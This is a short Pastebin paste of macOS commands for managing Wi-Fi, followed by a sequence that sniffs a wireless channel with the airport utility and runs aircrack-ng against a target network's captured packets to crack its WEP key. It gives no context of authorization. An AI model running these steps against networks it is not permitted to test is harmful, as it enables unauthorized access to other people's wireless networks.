evilqubit

mac airport and wep cracking

Jul 23rd, 2014
354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. networksetup -setairportpower en0 on / off
  2.  
  3. airport scan
  4.  
  5. networksetup -setairportnetwork en0 WIFI_SSID_I_WANT_TO_JOIN WIFI_PASSWORD
  6.  
  7. networksetup -listallhardwareports
  8.  
  9. kissmac && aircrack-ng
  10.  
  11.  
  12. ----------------------------------
  13.  
  14. sudo airport -s
  15.  
  16. sudo airport en1 sniff [CHANNEL]
  17.  
  18. //New Terminal Window
  19.  
  20. aircrack-ng -1 -a 1 -b [TARGETMACADDRESS] [CAP_FILE]
  21.  
  22. // Notes: the cap_file will be located in the /tmp/airportSniff*.cap
Add Comment
Please, Sign In to add comment